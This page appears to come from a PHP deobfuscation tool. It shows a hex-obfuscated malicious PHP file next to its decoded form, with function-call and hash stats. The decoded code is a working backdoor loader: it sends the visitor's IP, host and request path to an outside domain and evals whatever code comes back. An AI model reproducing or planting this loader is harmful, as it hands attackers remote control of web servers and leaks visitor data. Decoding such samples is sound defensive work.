Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php header(_typeGet()); eval (_httpGet("\x68\x74\x74\x70\x3A\x2F\x2F\x64\x71\x6B\x7A\x..

Decoded Output download

<?php 
header(_typeGet()); 
eval (_httpGet("http://dqkz.aug01code.com/eval.aspx?host=" . urlencode($_SERVER[" 
REMOTE_ADDR"]) . "&domain=" . urlencode($_SERVER["HTTP_HOST"]) . "&path="  . urlencode($_SERVER["R\ 
x45QUEST_URI"]))); 
function _httpGet($url){ 
        $curl = curl_init(); 
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); 
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); 
        curl_setopt($curl, CURLOPT_URL, $url); 
        $res = curl_exec($curl); 
        curl_close($curl); 
        return $res; 
    } 
function _typeGet(){ 
        $path = $_SERVER["REQUEST_URI"]; 
        if (strpos($path, ".xml")) 
                return "Content-Type: application/xml"; 
        if (strpos($path, ".js")) 
                return "Content-Type: application/javascript"; 
        return "Content-Type: text/html"; 
    } 
?>

Did this file decode correctly?

Original Code

<?php
header(_typeGet());
eval (_httpGet("\x68\x74\x74\x70\x3A\x2F\x2F\x64\x71\x6B\x7A\x2E\x61\x75\x67\x30\x31\x63\x6F\x64\x65\x2E\x63\x6F\x6D\x2F\x65\x76\x61\x6C\x2E\x61\x73\x70\x78\x3F\x68\x6F\x73\x74\x3D" . urlencode($_SERVER["
\x52\x45\x4D\x4F\x54\x45\x5F\x41\x44\x44\x52"]) . "\x26\x64\x6F\x6D\x61\x69\x6E\x3D" . urlencode($_SERVER["\x48\x54\x54\x50\x5F\x48\x4F\x53\x54"]) . "\x26\x70\x61\x74\x68\x3D"  . urlencode($_SERVER["\x52\
x45\x51\x55\x45\x53\x54\x5F\x55\x52\x49"])));
function _httpGet($url){
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($curl, CURLOPT_URL, $url);
        $res = curl_exec($curl);
        curl_close($curl);
        return $res;
    }
function _typeGet(){
        $path = $_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5F\x55\x52\x49"];
        if (strpos($path, "\x2E\x78\x6D\x6C"))
                return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x6D\x6C";
        if (strpos($path, "\x2E\x6A\x73"))
                return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74";
        return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C";
    }
?>

Function Calls

_typeGet 1

Variables

None

Stats

MD5 b70c6a9214c284d0a1e44215c7ad1bc4
Eval Count 0
Decode Time 82 ms